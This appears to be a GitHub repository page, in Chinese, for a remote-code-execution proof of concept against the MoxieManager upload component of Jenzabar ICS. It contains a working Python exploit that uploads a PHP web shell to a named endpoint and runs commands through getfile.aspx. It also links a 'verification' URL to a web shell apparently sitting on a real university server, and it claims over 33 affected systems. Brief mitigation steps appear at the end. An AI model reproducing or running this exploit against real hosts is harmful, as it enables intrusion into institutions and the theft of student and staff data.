itsismarcos/ICS-MoxieManager-FileUpload-PoC

GitHub: itsismarcos/ICS-MoxieManager-FileUpload-PoC

针对 Jenzabar ICS 系统 MoxieManager 组件严重文件上传漏洞(CVE-2026-30-03)的远程代码执行(RCE)概念验证与利用脚本。

Stars: 0 | Forks: 0

# ICS-MoxieManager-RCE-CVE-2026-30-03 CVE-2026-30-03 9.8(严重)可能的 Jenzabar ICS + MoxieManager RCE 漏洞 验证 https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be CVE CVSS 影响 受影响项 CVE-2026-30-03 9.8(严重) 可能的 RCE Jenzabar ICS + MoxieManager Jenzabar ICS 系统使用的 MoxieManager 组件中存在一个漏洞,可能允许不安全的文件上传,在特定条件下,这些文件可被公开访问,并可能导致远程代码执行 (RCE)。 技术描述 该问题是由于以下原因造成的: 缺乏对上传文件的适当验证 可能通过公共端点暴露文件: /ICS/staticpages/getfile.aspx 端点上的身份验证控制不一致: /ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx 在特定场景下,上传的文件可能被存储在可访问的目录中,并随后可被检索。 影响 任意文件上传 敏感内容泄露 可能的远程代码执行(取决于服务器配置) 系统全面沦陷 分类 CVSS v3.1:9.8(严重) 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE-434:不受限制的文件上传 CWE-284:访问控制不当 PoC 漏洞利用 #!/usr/bin/env python3 # CVE-2026-30-03 PoC - ICS MoxieManager RCE import requests TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101" # 1. 上传 PHP Shell files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'} r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}") # 2. 执行 SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text) 受影响的系统(已确认 33 个以上) 修复方案 紧急(缓解措施): 1. 删除 /moxiemanager/files/users/*/shell.php 2. 限制 getfile.aspx: 3. RewriteRule ^/ICS/staticpages/getfile\.aspx\?target=.*shell\.php - [F,L] 4. 禁用 MoxieManager 上传功能 验证 https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443
标签:CISA项目, CVE-2026-30-03, CVSS 9.8, CWE-284, CWE-434, Jenzabar ICS, MoxieManager, PoC, RCE, Web安全, 任意文件上传, 反取证, 安全评估, 教育系统安全, 暴力破解, 未授权访问, 编程工具, 网络安全, 蓝队分析, 访问控制不当, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞